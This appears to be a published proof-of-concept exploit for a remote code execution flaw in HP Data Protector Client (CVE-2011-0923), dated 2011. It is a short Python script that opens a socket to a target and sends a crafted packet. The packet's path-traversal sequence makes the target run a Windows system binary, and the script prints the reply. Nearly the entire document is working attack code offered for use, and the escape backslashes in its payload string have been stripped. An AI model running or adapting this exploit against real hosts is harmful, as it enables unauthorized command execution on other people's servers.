HP Data Protector Client Code Execution (PoC, ZDI-11-055 / CVE-2011-0923)
Posted on 28 May 2011
# Exploit Title: HP Data Protector Client Remote Code Execution Vulnerability PoC (ZDI-11-055) # Date: 2011-05-28 # Coded by: fdisk # Version: 6.11 # Tested on: Windows 2003 Server SP2 en # CVE: CVE-2011-0923 # Notes: ZDI-11-055 # Reference: http://www.zerodayinitiative.com/advisories/ZDI-11-055/ # Reference: http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143 import socket import sys if len(sys.argv) != 3: print "Usage: ./HPDataProtectorRCE.py <Target IP> <Port>" sys.exit(1) host = sys.argv[1] port = int(sys.argv[2]) payload = ( "x00x00x00xa4x20x32x00x20x66x64x69x73x6bx79x6fx75" "x00x20x30x00x20x53x59x53x54x45x4dx00x20x66x64x69" "x73x6bx79x6fx75x00x20x43x00x20x32x30x00x20x66x64" "x69x73x6bx79x6fx75x00x20x50x6fx63x00x20x4ex54x41" "x55x54x48x4fx52x49x54x59x00x20x4ex54x41x55x54x48" "x4fx52x49x54x59x00x20x4ex54x41x55x54x48x4fx52x49" "x54x59x00x20x30x00x20x30x00x20x2ex2ex2fx2ex2ex2f" "x2ex2ex2fx2ex2ex2fx2ex2ex2fx2ex2ex2fx2ex2ex2fx2e" "x2ex2fx2ex2ex2fx2ex2ex2fx5cx77x69x6ex64x6fx77x73" "x5cx73x79x73x74x65x6dx33x32x5cx69x70x63x6fx6ex66" "x69x67x2ex65x78x65x00x00") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print "Sending payload" s.send(payload) while 1: data = s.recv(4096) if data: print data else: break s.close()
